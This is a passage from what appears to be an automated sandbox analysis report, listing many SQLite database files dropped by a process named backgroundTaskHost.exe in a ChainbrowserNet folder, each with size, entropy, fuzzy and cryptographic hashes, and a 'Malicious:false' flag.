                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
